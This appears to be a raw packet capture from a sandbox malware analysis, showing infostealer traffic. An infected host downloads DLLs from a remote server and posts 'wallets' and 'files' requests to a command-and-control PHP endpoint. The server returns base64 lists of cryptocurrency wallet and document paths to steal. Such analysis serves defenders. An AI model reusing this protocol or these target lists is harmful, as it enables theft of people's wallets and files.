00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:13.005757093 CEST94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:13.310272932 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:13 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 257872
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:13.593606949 CEST98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:13.898395061 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:13 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 80880
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.593592882 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 1067
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.923685074 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:14.957422018 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 267
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BFHDHJKKJDHJJJJKEGHIContent-Disposition: form-data; name="message"wallets------BFHDHJKKJDHJJJJKEGHI--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.267060041 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 2408
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 58 45 64 79 5a 57 56 75 58 48 64 68 62 47 78 6c 64 48 4e 63 66 43 6f 75 4b 6e 77 78 66 46 64 68 63 32 46 69 61 53 42 58 59 57 78 73 5a 58 52 38 4d 58 78 63 56 32 46 73 62 47 56 30 56 32 46 7a 59 57 4a 70 58 45 4e 73 61 57 56 75 64 46 78 58 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 6d 70 7a 62 32 35 38 4d 48 78 46 64 47 68 6c 63 6d 56 31 62 58 77 78 66 46 78 46 64 47 68 6c 63 6d 56 31 62 56 78 38 61 32 56 35 63 33 52 76 63 6d 56 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 58 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 56 78 33 59 57 78 73 5a 58 52 7a 58 48 77 71 4c 69 70 38 4d 48 78 46 62 47 56 6a 64 48 4a 31 62 55 78 55 51 33 77 78 66 46 78 46 62 47 56 6a 64 48 4a 31 62 53 31 4d 56 45 4e 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 52 58 68 76 5a 48 56 7a 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 38 5a 58 68 76 5a 48 56 7a 4c 6d 4e 76 62 6d 59 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 33 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 66 48 64 70 62 6d 52 76 64 79 31 7a 64 47 46 30 5a 53 35 71 63 32 39 75 66 44 42 38 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 38 4d 58 78 63 52 58 68 76 5a 48 56 7a 58 47 56 34 62 32 52 31 63 79 35 33 59 57 78 73 5a 58 52 63 66 48 42 68 63 33 4e 77 61 48 4a 68 63 32 55 75 61 6e 4e 76 62 6e 77 77 66 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 66 44 46 38 58 45 56 34 62 32 52 31 63 31 78 6c 65 47 39 6b 64 58 4d 75 64 32 46 73 62 47 56 30 58 48 78 7a 5a 57 56 6b 4c 6e 4e 6c 59 32 39 38 4d 48 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 48 77 78 66 46 78 46 65 47 39 6b 64 58 4e 63 5a 58 68 76 5a 48 56 7a 4c 6e 64 68 62 47 78 6c 64 46 78 38 61 57 35 6d 62 79 35 7a 5a 57 4e 76 66 44 42 38 52 57 78 6c 59 33 52 79 62 32 34 67 51 32 46 7a 61 48 77 78 66 46 78 46 62 47 56 6a 64 48 4a 76 62 6b 4e 68 63 32 68 63 64 32 46 73 62 47 56 30 63 31 78 38 4b 69 34 71 66 44 42 38 54 58 56 73 64 47 6c 45 62 32 64 6c 66 44 46 38 58 45 31 31 62 48 52 70 52 47 39 6e 5a 56 78 38 62 58 56 73 64 47 6c 6b 62 32 64 6c 4c 6e 64 68 62 47 78 6c 64 48 77 77 66 45 70 68 65 48 67 67 52 47 56 7a 61 33 52 76 63 43 41 6f 62 32 78 6b 4b 58 77 78 66 46 78 71 59 58 68 34 58 45 78 76 59 32 46 73 49
                                                                                                                                                                                                                                                                                      Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11bHRpRG9nZVx8bXVsdGlkb2dlLndhbGxldHwwfEpheHggRGVza3RvcCAob2xkKXwxfFxqYXh4XExvY2FsI
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.287791014 CEST466OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 265
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36 32 66 32 33 34 35 62 33 38 61 65 34 33 34 38 38 61 65 63 30 36 61 63 64 31 65 35 65 39 39 32 31 65 30 38 38 63 63 39 30 36 33 31 35 39 35 30 65 32 37 32 39 36 35 37 61 64 36 37 37 35 62 66 66 39 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 41 45 43 46 43 41 41 45 42 46 48 49 45 48 44 47 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"files------DAECAECFCAAEBFHIEHDG--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:15.598342896 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 2052
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Data Raw: 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 52 45 56 54 53 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6e 42 75 5a 79 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 5a 47 59 73 4b 6d 4a 68 59 32 74 31 63 43 6f 75 63 47 35 6e 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 6b 5a 69 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 35 6e 4c 43 70 79 5a 57 4e 76 64 6d 56 79 4b 69 35 77 5a 47 59 73 4b 6d 31 6c 64 47 46 74 59 58 4e 72 4b 69 34 71 4c 43 70 56 56 45 4d 74 4c 53 6f 75 4b 6e 77 78 4e 54 41 77 66 44 46 38 4d 58 78 45 54 30 4e 54 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 52 45 39 44 55 33 77 6c 52 45 39 44 56 55 31 46 54 6c 52 54 4a 56 78 38 4b 69 35 30 65 48 51 73 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 48 77 31 66 44 46 38 4d 58 78 53 52 55 4e 38 4a 56 4a 46 51 30 56 4f 56 43 56 63 66 43 6f 75 64 48 68 30 4c 43 6f 75 5a 47 39 6a 65 43 77 71 4c 6e 68 73 63 33 68 38 4e 58 77 78 66 44 46 38 55 6b 56 44 66 43 56 53 52 55 4e 46 54 6c 51 6c 58 48 77 71 64 32 46 73 62 47 56 30 4b 69 35 77 62 6d 63 73 4b 6e 64 68 62 47 78 6c 64 43 6f 75 63 47 52 6d 4c 43 70 69 59 57 4e 72 64 58 41 71 4c 6e 42 75 5a 79 77 71 59 6d 46 6a 61 33 56 77 4b 69 35 77 5a 47 59 73 4b 6e 4a 6c 59 32 39 32 5a 58 49 71 4c 6e 42 75 5a 79 77 71 63 6d 56 6a 62 33 5a 6c 63 69 6f 75 63 47 52 6d 4c 43 70 74 5a 58 52 68 62 57 46 7a 61 79 6f 75 4b 69 77 71 56 56 52 44 4c 53 30 71 4c 69 70 38 4d 54 55 77 4d 48 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 48 77 71 4c 6e 68 74 62 48 77 78 4e 58 77 78 66 44 46 38 54 6b 39 55 52 56 42 42 52 48 77 6c 51 56 42 51 52 45 46 55 51 53 56 63 54 6d 39 30 5a 58 42 68 5a 43 73 72 58 47 4a 68 59 32 74 31 63 46 78 38 4b 69 34 71 66 44 45 31 66 44 46 38 4d 58 78 54 56 55 4a 4d 53 55 31 46 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 54 64 57 4a 73 61 57 31 6c 49 46 52 6c 65 48 51 67 4d 31 78 4d 62 32 4e 68 62 46 78 54 5a 58 4e 7a 61 57 39 75 4c 6e 4e 31 59 6d 78 70 62 57 56 66 63 32 56 7a 63 32 6c 76 62 6c 78 38 4b 69 35 7a 64 57 4a 73 61 57 31 6c 58 79 70 38 4d 54 56 38 4d 58 77 78 66 46 5a 51 54 6c 39 44 61 58 4e 6a 62 31 5a 51 54 6e 77 6c 55 46 4a 50 52 31 4a 42 54 55 5a 4a 54 45 56 54 4a 56 78 63 4c 69 35 63 58 46 42 79 62 32 64 79 59 57 31 45 59 58 52 68 58 46 78 44 61 58 4e 6a 62 31 78 44 61 58 4e 6a 62 79 42 42 62 6e 6c 44 62 32 35 75 5a 57 4e 30 49 46 4e 6c 59 33 56 79 5a 53 42 4e 62 32 4a 70 62 47 6c 30 65 53 42 44 62 47 6c 6c 62 6e 52 63 55 48 4a 76 5a 6d 6c 73 5a 56 78 38 4b 69 35 34 62 57 78 38 4d 54 41 77 66 44 46 38 4d 48 78 57 55 45 35 66 52 6d 39 79 64 47 6c 75 5a 58 52 38 4a 56 42 53 54 30 64 53 51 55 31 47 53
